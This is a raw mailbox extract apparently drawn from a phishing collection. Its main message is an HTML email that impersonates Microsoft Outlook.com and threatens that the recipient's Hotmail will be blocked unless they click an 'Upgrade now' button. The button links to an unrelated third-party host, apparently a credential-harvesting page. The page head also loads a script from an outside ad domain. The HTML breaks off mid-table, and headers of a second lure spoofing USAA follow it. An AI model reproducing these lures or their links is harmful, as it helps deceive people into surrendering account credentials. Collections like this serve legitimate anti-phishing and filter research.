From: Outlook.com <Update@hotmail.com>
Reply-To: 
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Message-Id: <E1ZyXGe-0002yI-IP@sim.simeon.com.br>
Date: Tue, 17 Nov 2015 01:49:16 -0200
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - sim.simeon.com.br
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [501 32007] / [47 12]
X-AntiAbuse: Sender Address Domain - sim.simeon.com.br
X-Get-Message-Sender-Via: sim.simeon.com.br: authenticated_id: acspmbmg/only user confirmed/virtual account not confirmed
X-Authenticated-Sender: sim.simeon.com.br: acspmbmg
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php /home/acspmbmg/public_html/index.php 
X-Source-Dir: acspmbmgo.com.br:/public_html/img/oficiosimg
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 267

<html>
	<head>
<script type="text/javascript" id="2f2a695a6afce2c2d833c706cd677a8e" src="http://d.deliversuper.com/xuiow/?o=3&g=391B6FBE-042E-CC22-BBEF-11C098824741&s=7B0A8368-1A6F-48A5-B236-8BD61816B3F9&z=1400019089"></script>

		<title>HTML Generator Sample Page</title>
	</head>
	<body>
		<table align="center" border="0" cellpadding="0" cellspacing="0" width="600">
			<tbody>
				<tr>
					<td style="line-height:0px;font-size:0px" width="600">
						<table border="0" cellpadding="0" cellspacing="0" width="600">
							<tbody>
								<tr>
									<td height="17" style="line-height:0px;font-size:0px" width="600">
										 </td>
								</tr>
								<tr>
									<td height="17" style="line-height:0px;font-size:0px" width="600">
										<table border="0" cellpadding="0" cellspacing="0" width="600">
											<tbody>
												<tr>
													<td width="27">
														<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
													<td align="left" width="573">
														<img alt="Outlook logo" border="0" height="25" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/Outlook-logo.gif" width="156" /></td>
												</tr>
											</tbody>
										</table>
									</td>
								</tr>
								<tr>
									<td height="17" style="line-height:0px;font-size:0px" width="600">
										<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
								</tr>
							</tbody>
						</table>
					</td>
				</tr>
				<tr>
					<td style="line-height:0px;font-size:0px" width="600">
						<img alt="Outlook - Upgrade your Hotmail inbox to Outlook.com" border="0" height="281" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/banner-tablet.jpg" width="600" /></td>
				</tr>
				<tr>
					<td height="46" style="line-height:0px;font-size:0px" width="600">
						<table bgcolor="#0073c6" border="0" cellpadding="0" cellspacing="0" width="600">
							<tbody>
								<tr>
									<td height="18" style="line-height:0px;font-size:0px" width="600">
										<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" />
										<table border="0" cellpadding="0" cellspacing="0" width="600">
											<tbody>
												<tr>
													<td style="line-height:0px;font-size:0px" width="25">
														<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
													<td style="line-height:0px;font-size:0px" width="546">
														<table border="0" cellpadding="0" cellspacing="0" width="550">
															<tbody>
																<tr>
																	<td width="550">
																		<font color="#ffffff" face="Segoe XDR Light, Segoe WP, Segoe UI, Helvetica, Arial" style="line-height:40px;font-size:30px;letter-spacing:-1px;font-weight:100">Upgrade your Hotmail inbox to Outlook.com</font></td>
																</tr>
																<tr>
																	<td height="18" style="line-height:0px;font-size:0px" width="550">
																		<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
																</tr>
																<tr>
																	<td>
																		<table border="0" cellpadding="0" cellspacing="0" width="550">
																			<tbody>
																				<tr>
																					<td style="line-height:0px;font-size:0px" width="487">
																						<font color="#ffffff" face="Segoe XDR Regular, Segoe WP, Segoe UI, Helvetica, Arial" style="line-height:22px;font-size:16px">One click puts your inbox on a whole new level.<br />
																						Get the newest email service from Microsoft for free.</font></td>
																					<td style="line-height:0px;font-size:0px" valign="top" width="113">
																						<table border="0" cellpadding="0" cellspacing="0" width="113">
																							<tbody>
																								<tr>
																									<td height="16" style="line-height:0px;font-size:0px" width="113">
																										<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
																								</tr>
																								<tr>
																									<td style="line-height:0px;font-size:0px" width="113">
																										<a href="http://nieruchomoscikrakowskie.home.pl/pub/live.html" target="_blank"><img alt="Upgrade now" border="0" height="24" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/Upgrade.gif" width="113" /></a></td>
																								</tr>
																							</tbody>
																						</table>
																					</td>
																				</tr>
																			</tbody>
																		</table>
																	</td>
																</tr>
															</tbody>
														</table>
													</td>
													<td style="line-height:0px;font-size:0px" width="25">
														<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
												</tr>
											</tbody>
										</table>
									</td>
								</tr>
								<tr>
									<td style="line-height:0px;font-size:0px" width="600">
										 </td>
								</tr>
								<tr>
									<td height="30" style="line-height:0px;font-size:0px" width="600">
										<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
								</tr>
							</tbody>
						</table>
					</td>
				</tr>
				<tr>
					<td height="34" style="line-height:0px;font-size:0px" width="600">
						<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
				</tr>
				<tr>
					<td style="line-height:0px;font-size:0px" width="600">
						<table border="0" cellpadding="0" cellspacing="0" width="600">
							<tbody>
								<tr>
									<td style="line-height:0px;font-size:0px" width="26">
										<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
									<td width="574">
										<font color="#0072c6" face="Segoe XDR Regular, Segoe WP, Segoe UI, Helvetica, Arial" style="line-height:20px;font-size:16px">Your Hotmail will be block if you don't upgraded to Outlook.com soon, or you can quickly upgrade today by clicking the button above.</font></td>
								</tr>
							</tbody>
						</table>
					</td>
				</tr>
				<tr>
					<td height="6" style="line-height:0px;font-size:0px" width="600">
						<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
				</tr>
				<tr>
					<td style="line-height:0px;font-size:0px" width="600">
						<table border="0" cellpadding="0" cellspacing="0" width="600">
							<tbody>
								<tr>
									<td style="line-height:0px;font-size:0px" width="26">
										<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
									<td width="574">
										<font color="#454545" face="Segoe XDR Regular, Segoe WP, Segoe UI, Helvetica, Arial" style="line-height:18px;font-size:12px">Outlook.com has the best of Hotmail's features like Sweep, Filters and world-class spam protection that blocks 97% of spam from your inbox. When you upgrade to Outlook.com you get so much <em>more</em> than just a new inbox.</font></td>
								</tr>
							</tbody>
						</table>
					</td>
				</tr>
				<tr>
					<td height="36" style="line-height:0px;font-size:0px" width="600">
						<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
				</tr>
				<tr>
					<td width="600">
						<table border="0" cellpadding="0" cellspacing="0" width="600">
							<tbody>
								<tr>
									<td style="line-height:0px;font-size:0px" width="26">
										<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
									<td align="left" style="line-height:0px;font-size:0px" valign="top" width="255">
										<table border="0" cellpadding="0" cellspacing="0" width="255">
											<tbody>
												<tr>
													<td height="5" style="line-height:0px;font-size:0px">
														<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
												</tr>
												<tr>
													<td style="line-height:0px;font-size:0px" width="255">
														<img alt="See More" border="0" height="145" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/see-more.gif" width="255" /></td>
												</tr>
											</tbody>
										</table>
									</td>
									<td style="line-height:0px;font-size:0px" width="21">
										<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
									<td style="line-height:0px;font-size:0px" valign="top" width="283">
										<table border="0" cellpadding="0" cellspacing="0" width="283">
											<tbody>
												<tr>
													<td align="left" style="line-height:0px;font-size:0px" width="283">
														<font color="#0072c6" face="Segoe XDR Regular, Segoe WP, Segoe UI, Helvetica, Arial" style="line-height:20px;font-size:16px">See More</font></td>
												</tr>
												<tr>
													<td height="7" style="line-height:0px;font-size:0px" width="283">
														<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
												</tr>
												<tr>
													<td style="line-height:0px;font-size:0px" width="283">
														<font color="#454545" face="Segoe XDR Regular, Segoe WP, Segoe UI, Helvetica, Arial" style="line-height:18px;font-size:12px">The new Outlook.com inbox has a streamlined design with less clutter and shows 30% more messages in the inbox. When you're writing emails to your friends and contacts, you can see their latest Facebook and Twitter updates in the same window.</font></td>
												</tr>
											</tbody>
										</table>
									</td>
									<td valign="top" width="15">
										<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
								</tr>
							</tbody>
						</table>
					</td>
				</tr>
				<tr>
					<td height="43" style="line-height:0px;font-size:0px" width="600">
						<img alt="" border="0" height="1" src="http://ads1.msn.com/ads/pronws/CIQ/HMML/2013-01_Spring_Auto_Upgrade_Service_Notifications/Outlook_Autoupgrade_B_Spring/en-gb/space.gif" width="1" /></td>
				</tr>
				<tr>
					<td width="600">
						<table border="0" cellpadding="0" cellspacing="0" width="600">
							<tbody>
								<tr>
									<td width="26">



From jose@monkey.org Fri Nov 27 02:33:09 2015 +0000
Return-Path: usaa.protectionsupport@usa.com
Delivered-To: jose@monkey.org
X-FDA: 70898808498.13.jelly73_5537ebeaa7052
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 50,3,0,3590e84d56f9d137,d41d8cd98f00b204,usaa.protectionsupport@usa.com,:usaa.protectionsupport@usa.com,RULES_HIT:4:41:72:355:379:455:581:800:962:967:973:978:983:988:989:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1390:1431:1432:1433:1434:1436:1437:1516:1517:1518:1545:1575:1588:1592:1594:1685:1730:1744:1777:1792:1801:1803:2084:2107:2194:2196:2198:2199:2200:2201:2525:2527:2528:2568:2610:2637:2682:2685:2737:2741:2859:2890:2891:2892:2894:2895:2896:2903:2914:2916:2917:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3154:3353:3770:3866:3867:3868:3870:3871:3872:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4242:4321:4365:4605:4700:5007:6117:6248:6650:6669:6678:6687:7208:7266:7774:7809:7903:8516:8518:8550:8568:8599:8603:8784:8957:9025:9060:9080:9121:9130:9149:9177:9388:9908:10030:10049:10231:10346:10562:10946:11026:11233:11473:11658:11914:12043:12438:12555:12561:12679:12729:12737:12740:12776:12812:12963:
X-HE-Tag: jelly73_5537ebeaa7052
X-Filterd-Recvd-Size: 15838
Received: from ELBSAP.elb.local (unknown [186.200.78.210])
	by imf03.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri, 27 Nov 2015 02:33:03 +0000 (UTC)
Received: from ELBSAP.elb.local ([127.0.0.1]) by ELBSAP.elb.local with Microsoft SMTPSVC(7.0.6001.18000);
	 Thu, 26 Nov 2015 21:57:09 -0200
Content-Type: multipart/alternative; boundary="===============2070871981=="
MIME-Version: 1.0
Subject: Your USAA Account Profile Preference Update
To: Recipients <USAA.protectionsupport@usa.com>
